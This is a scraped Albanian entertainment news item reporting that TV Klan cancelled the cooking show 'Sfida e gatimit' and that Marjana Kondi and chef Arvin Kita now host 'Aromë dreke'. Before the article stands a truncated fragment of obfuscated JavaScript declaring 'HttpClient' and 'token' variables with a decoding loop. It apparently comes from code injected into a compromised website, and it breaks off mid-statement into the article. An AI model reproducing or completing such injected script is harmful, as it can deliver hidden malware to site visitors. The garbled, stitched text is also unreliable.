;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mbyllet një tjetër program në TV Klan, aktorja e njohur pjesë e formatit të ri

By

Në fillim të këtij sezoni televiziv, mediat shkruajtën mbi një varg formatesh të mbyllura e të shkrira në televizionin Klan.

‘Xing me Ermalin’ nuk u rikthye, teksa njejtë ndodhi edhe me ‘Duplex’ dhe ‘BE Coffee’ ku një pjesë e kastit të aktorëve u bënë pjesë e ‘Klanifornia’.

Dritë në transmetim nuk pa më as ‘Ditë për ditë’ pas vetëm pak muajsh nga nisja zyrtare me pompozitet me disa figura të reja që u bënë pjesë e programit.

E duket se një tjetër program është mbyllur përfundimisht pas një sezoni e gjysmë.

Fjala është për formatin e gatimit ‘Sfida e gatimit’ nga Alfio dhe Indriti të cilin producentët e TV Klan e bartën të gatshëm siç veprojnë rëndom, nga IN TV.

Image result for alfio rrotani indrit

Ky format nuk është rikthyer më pas festave dhe do të zëvendësohet nga dy emra të rinj.

Aktorja e njohur Marjana Kondi dhe shefi i kuzhinës Arvin Kita do të jenë nga e Hëna në të Shtunë bashkë me publikun nga ora 11:00 në programin ‘Aromë dreke’.

Pas tentativave me ‘Kush vjen për drekë’ që pati në fokus fytyra publike, dyshes Alfio dhe Indrit si shefa profesionistë, duket se tentativa e radhës për të gjetur formatin e duhur përfshin një profesionist dhe një figurë mjaft popullore si aktorja Kondi.

Se a do jetë gjetja e qëlluar, kjo mbetet që të shihet. /Prive.al

Artikuj të ngjashëm